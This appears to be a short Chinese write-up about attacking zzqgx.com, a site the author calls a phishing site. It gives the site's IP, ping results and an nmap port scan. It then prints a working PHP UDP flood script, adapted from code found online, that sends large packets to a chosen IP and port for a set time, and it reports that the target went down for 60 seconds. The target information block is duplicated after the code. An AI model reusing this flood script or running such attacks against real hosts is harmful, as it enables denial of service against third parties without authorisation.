test.php
测试目标:http://zzqgx.com/ (一个钓鱼网站)
目标信息:
PING zzqgx.com (118.193.197.40): 56 data bytes
64 bytes from 118.193.197.40: icmp_seq=0 ttl=105 time=99.915 ms
sudo nmap -sS 118.193.197.40
Starting Nmap 7.12 ( https://nmap.org ) at 2016-09-25 17:24 CST
Nmap scan report for 118.193.197.40
Host is up (0.083s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
19/tcp filtered chargen
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
593/tcp filtered http-rpc-epmap
1025/tcp filtered NFS-or-IIS
1026/tcp open LSA-or-nterm
1900/tcp filtered upnp
2301/tcp open compaqdiag
3389/tcp open ms-wbt-server
4444/tcp filtered krb524
6129/tcp filtered unknown
阻塞80端口
本地测试:
http://***/test.php?ip=118.193.197.40&port=80&time=60
target down!
60秒内此网页无法加载
参考网上php 代码所修改
<?php
$packets = 0;
$ip = $_GET["ip"];
$rand = $_GET["port"];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET["time"];
$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= "X";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
测试目标:http://zzqgx.com/ (一个钓鱼网站)
目标信息:
PING zzqgx.com (118.193.197.40): 56 data bytes
64 bytes from 118.193.197.40: icmp_seq=0 ttl=105 time=99.915 ms
sudo nmap -sS 118.193.197.40
Starting Nmap 7.12 ( https://nmap.org ) at 2016-09-25 17:24 CST
Nmap scan report for 118.193.197.40
Host is up (0.083s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
19/tcp filtered chargen
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
593/tcp filtered http-rpc-epmap
1025/tcp filtered NFS-or-IIS
1026/tcp open LSA-or-nterm
1900/tcp filtered upnp
2301/tcp open compaqdiag
3389/tcp open ms-wbt-server
4444/tcp filtered krb524
6129/tcp filtered unknown
阻塞80端口
本地测试:
http://***/test.php?ip=118.193.197.40&port=80&time=60
target down!
60秒内此网页无法加载